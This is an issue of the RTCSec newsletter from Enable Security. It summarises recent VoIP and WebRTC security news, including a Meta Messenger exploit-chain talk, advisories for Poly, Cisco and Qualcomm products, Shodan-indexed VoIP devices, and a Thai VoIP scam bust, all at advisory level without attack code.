Welcome to the November issue of your favourite VoIP and WebRTC security newsletter!
In this edition, we cover:
- Exploitation of Messenger from Meta and the internals of this application.
- Vulnerabilities in WebRTC, Poly Video Conferencing systems, Cisco phones, Qualcomm DSP video codecs.
- VoIP devices on the Internet, Shodan has you covered.
The RTCSec newsletter is a free periodic newsletter bringing you commentary and news around VoIP and WebRTC security. We cover both defensive and offensive security as they relate to Real-time Communications.
What is RTC security anyway? Real-time communications security determines if you can safely communicate in real time - whether it be with other humans or machines.
You may sign up to receive the RTCSec newsletter here. If you like what we’re doing, you’re most welcome to:
- Forward it to those who may find this newsletter particularly fruitful.
- Let us know if there are any RTC security news items we should cover.
To view past issues, please visit our website at https://www.enablesecurity.com/newsletter/.
Our news
2025 is knocking - Penetration Testing or Security Consultancy?
As we approach the end of the year, our team at Enable Security is already gearing up for an exciting Q1 2025. If you have a product that requires thorough security assessment, particularly in the realm of VoIP and WebRTC systems, we’re uniquely positioned to help. Our expertise extends beyond these areas, covering application Denial-of-Service (DoS), web applications and network security to ensure the appropriate coverage for your communications systems.
We understand that not all companies are ready for a full penetration test, yet still require valuable insights into their security decisions. That’s why we offer flexible consultancy services tailored to your specific needs. Whether you’re looking for focused guidance on particular aspects of your RTC applications or a broader overview, we are there to assist. This option is particularly beneficial for startups operating with tighter budgets, allowing you to leverage our expertise without breaking the bank.
Get in touch with us through our online contact form or schedule a meeting directly.
What’s happening?
One click exploit for Messenger on Android - a talk at HEXACON2024
If the internals of the Messenger app from Meta is just your thing, this talk called Defense through Offense is a great resource. The authors cover chaining vulnerabilities in the internal libraries Rsys, which manages client-side signaling and WebRTC, and Spark AR which is the Augmented Reality effect engine used by Meta. The end result was to get remote code execution thanks to the following 4 vulnerabilities:
- Rsys Apps Vulnerable to Incoming Call Metadata Spoofing (affects Rsys)
- Out of bounds Read in
SegmentationModule:getForegroundPercent(affects Spark AR) - Signaling messages sendable over media data channel (affects Rsys)
- Incorrect Signed Integer Comparison Leads to OOB Write in
UnifiedPlanSdpUpdateSerializer::applyDelta(affects Rsys)
These vulnerabilities were discovered during internal code reviews at Meta. The talk concludes with a demonstration of remote code execution using a reverse shell.
This is an excellent talk and worth watching if you’re developing or testing anything similar to Meta Messenger. Give it a watch here.
Remote Code Execution Risk on Certain Poly Video Conference Devices (CVE-2024-9579)
This month, HP issued an advisory titled: Certain Poly Video Conference Devices – Potential Remote Code Execution. The description:
A potential vulnerability was discovered in certain Poly video conferencing devices. The firmware flaw does not properly sanitize user input. The exploitation of this vulnerability is dependent on a layered attack and cannot be exploited by itself.
We searched for additional information but found none. The security researchers from modzero who reported this flaw had previously issued advisories on Poly VoIP devices. Their full report detailed the following security issues:
- Administrator Session Prediction
- Denial of Service Through HTTP Request
- OS Command Injection in Diagnostics-Telnet
- Configuration Import Allows Unverified Password Change
- Missing Firmware Anti-Rollback Protection
- Backdoor-Mode Allows Telnet Root Access
- Missing Authorization for Cloud Registration Code
These were fixed back in January 2024.
Security researcher, Shawn Merdinger, posting about VoIP device found on the Internet
These past weeks, Shawn Merdinger has been publishing interesting LinkedIn posts that feature VoIP devices and related software that is indexed by Shodan, the search engine for the Internet of Everything.
Here’s a quick summary of each:
- A post about VoIP devices on Shodan mentions how the search engine has indexed 10,733 devices from Grandstream Networks that have their web interface exposed to the Internet. Access to this web interface allows malicious users to do a lot, including network packet capturing and generation of phone calls. He also covered Polycom’s devices, including some that appear to be actually defaced, displaying messages such as “hacked by …”. Cisco, FreePBX and Snom also got a mention. The original post can be read here.
- He came across 65 Vocera Web Console interfaces, which are communications devices used in the healthcare industry - no known vulnerabilities for this web interface and Vocera has undergone various changes in the past, including becoming part of Stryker Corporation. Original post here.
Shawn is a pioneer in VoIP device research, having been active in the field since 2005 and publishing various advisories during that time. While his recent posts focused on web interfaces, one can also search for VoIP devices by searching for port 5060, which turns up 4,246,592 results at the time of writing.
Uncovering Hidden Threats: Dr. Willy R. Vasquez on Video Codecs, CVEs, and Zero Trust
Dr. Willy Vasquez discussed video codec security and related topics on the YouTube channel “John Has Trust Issues.” If you’re interested in this subject, you can watch the interview here .
They covered topics like:
- Malicious video files, such as those that compromised Jeff Bezos’ smart phone through WhatsApp.
- Sandboxing video parsing code can mitigate security issues he researched at the University of Texas.
- Using H26Forge to fuzz video parsing software, discovering crashes and potential vulnerabilities, including some in the iOS kernel.
- His journey into the world of security research and how he entered the field.
Security Updates and Vulnerability News Round-Up
Authorities bust multi-million message SMS fraud and 730 million call VoIP scam in Thailand
Thai authorities uncovered two large-scale tech-based scams. The SMS fraud employed fake base stations to directly blast messages, showcasing an advanced technical approach. Meanwhile, the VoIP scam involved massive call centers using SIP trunks to bypass national carriers, facilitating millions of fraudulent calls.
Use after free in WebRTC. Reported by Cassidy Kim(@cassidy6564) on 2024-10-18
A “use after free” vulnerability was identified in WebRTC and reported by Cassidy Kim, who has a consistent track record of uncovering significant issues in WebRTC’s code. While the full details of the bug remain unreleased, it highlights the critical need to keep your web browser updated.
DEF CON 32 - Breaking Secure Web Gateways for Fun and Profit - Vivek Ramachandran, Jeswin Mathai
At DEF CON 32, Vivek Ramachandran and Jeswin Mathai from SquareX presented innovative techniques for bypassing Secure Web Gateways (SWGs) to deliver malware to web browsers. The presentation video is now available for all to watch.
Among their thirty demonstrated methods, one involved leveraging WebRTC by using a WebSocket connection for signaling to activate the WebRTC API, which then established a data channel to download malicious files. Their talk underscored the challenges SWGs face in filtering modern traffic, which has evolved far beyond traditional HTTP/1.1 patterns.
Cisco 7800, 8800, and 9800 Series Phones Information Disclosure Vulnerability
A medium severity vulnerability has been identified in Cisco’s 7800, 8800, and 9800 series phones, enabling unauthenticated, remote attackers to access sensitive information. Specifically, this flaw could expose incoming and outgoing call records on affected devices. However, it is noted that the Web Access feature, which could potentially be exploited, is disabled by default.
Cisco 6800, 7800, 8800, and 9800 Series Phones with Multiplatform Firmware Stored Cross-Site Scripting Vulnerabilities
This medium severity vulnerability affects Cisco 6800, 7800, 8800, and 9800 series phones with the SIP Firmware, potentially allowing stored cross-site scripting (XSS) attacks. To exploit these vulnerabilities, Web Access must be enabled (disabled by default) and the attacker must possess Admin credentials. If these web interfaces have no cross-site request forgery (CSRF) protection, an alternative attack vector involves tricking a logged-in administrator into visiting a malicious website. Exploitation remains challenging due to these prerequisites.
CVE-2024-38422 : Memory corruption while processing voice in Qualcomm Digital Signal Processor (DSP)
Included in Qualcomm’s November 2024 batch of security bulletins, CVE-2024-38422 addresses a memory corruption vulnerability in the Digital Signal Processor (DSP) when processing voice packets containing arbitrary data from the ADSP. The issue affects a wide range of Qualcomm products and is categorized with a “local” access vector. This could mean a local application may exploit the flaw to escalate privileges and potentially execute arbitrary code on the affected chip.
Snowflake, a censorship circumvention system using temporary WebRTC proxies
At USENIX Security ‘24, David Fifield from the Tor Project delivered a short talk about Snowflake, a system that leverages WebRTC technology to bypass internet censorship effectively. This is part of the TOR Browser, so it can be easily used by anyone.
This newsletter was prepared by Sandro Gauci and the Enable Security team for RTCSec newsletter subscribers. If you have someone in mind who would benefit from our content, please share it.
To subscribe: here